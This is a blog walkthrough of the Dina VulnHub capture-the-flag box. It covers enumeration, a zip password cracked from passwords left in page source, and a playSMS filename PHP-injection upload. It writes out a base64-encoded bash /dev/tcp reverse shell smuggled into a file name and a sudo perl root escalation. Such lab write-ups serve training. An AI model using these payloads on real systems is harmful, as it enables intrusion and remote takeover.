Dina Walkthrough

dina18

Hi All,

This post is a walkthrough for Dina 1.0.1 on Vulnhub.

Dina uses DHCP so you’ll have to figure out what the IP is. Using netdiscover -r IPRANGE will help you with that.

First thing to do is to run a nmap scan … nmap -sC -sV -v IPADDRESS -oN OUTPUTFILE

dina1

There’s not much to go off of except a webpage. It does list the directories from the robots.txt file. Let’s go to the webpage and see what’s there.

dina2

Not much here even when looking at the source. Let’s try some of the robot.txt directories.

dina3

This is not a normal error message. Let’s look at the source.

dina4

Ok so this is interesting. Somebody thought it was a great idea to put a bunch of passwords in the source of the webpage. This is a very simple example of security by obscurity and it doesn’t work. Unfortunately, we don’t have anything to try the passwords on. The other robot.txt directories didn’t turn up anything. Let’s do some more enumeration.

Running nikto on the site (nikto -h IPADDRESS) gives us some more directories to look at. One of them is called secure … that might be interesting.

dina5dina6

Inside the secure directory is a file called backup.zip. I couldn’t unzip it with native Kali tools, so I put it in Windows and used 7zip. It prompts for a password. Luckily, we have a few to try.

dina7

The first password in the list (freedom) worked and I was able to extract the mp3 file. Sometimes in CTFs, they put challenges into audio files. I was all prepared with my audio editor except the file wouldn’t load. It wasn’t an mp3.

dina8

Running file against the mp3 revealed that it was just a text file.

I renamed the file to a text file and took a look at it.

dina9

This gives us a user name and a new url with a login. Let’s check it out!

dina19

 

On the page is something called playSMS. Using the user name touhid and running through the password list from earlier, I was able to login with the password diana.

dina20

 

At this point, I looked for places to upload files or code. There was one place that allowed a file upload, but the file itself never really wrote to the system. I went to Google and searched for playSMS exploits and I found one in exploitDB. There are also two Metasploit modules that work on this VM. The manual way is more interesting though, so I’m going to show that method. If you can’t get it to work, go the Metasploit route.

dina21

The key here is the filename. After the upload, the system will display the filename. If the filename contains php code, the code will execute. In the example they are running the system command uname -a. Let’s try it and see what happens.

dina10

dina11

Now we have code execution! The only problem is that slashes / are not allowed in files names. That makes it really hard to get a reverse shell. They system does have netcat, but it’s not a version with the gaping security hole (-e flag). The solution is to encode the command string and get the system to run it on the other side.

First, let’s find a reverse shell to use. I used this from pentestmonkey: bash -i >& /dev/tcp/192.168.2.30/7777 0>&1

Now echo that into base64: echo “bash -i >& /dev/tcp/192.168.2.30/7777 0>&1” | base64

This gave me YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMzAvNzc3NyAwPiYxCg== as the encoded string. Yours will be different based on the IP address and port number.

dina12

So now we have an encoded string that should give us a reverse shell. Now we need to set up the filename to decode and run it on the other end.

Inside the single quotes where we had uname -a, we’re going to replace that with: echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMzAvNzc3NyAwPiYxCg== | base64 -d | bash

What we’re doing is echoing the string, piping it into base64 (decoding it with the -d flag), and finally piping the string to bash for execution.

Now we need to get our listener setup: nc -nlvp 7777

dina13

Once the file is uploaded, we get a shell!

dina14

The first thing I do after this is spawn a better shell: python -c ‘import pty; pty.spawn(“/bin/sh”)’

dina15

Now I can do things like sudo. Let’s check our sudo permissions with sudo -l.

dina16

This is awesome! We can run Perl commands as root. Googling for reverse shells, I easily found this one using Perl: perl -e ‘exec “/bin/bash”;’

The only change is that we’ll have to use the full path to Perl for this to work.

dina16

ROOT!

Navigating to the root directory and viewing the root flag is now possible.

dina17

That’s the box. It was definitely beginner level especially if using Metasploit. Hopefully you found it helpful.

If you want to see a video walkthrough where I also show the Metasploit path, you can view it here on YouTube

 

-R3a50n

 

 

 

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s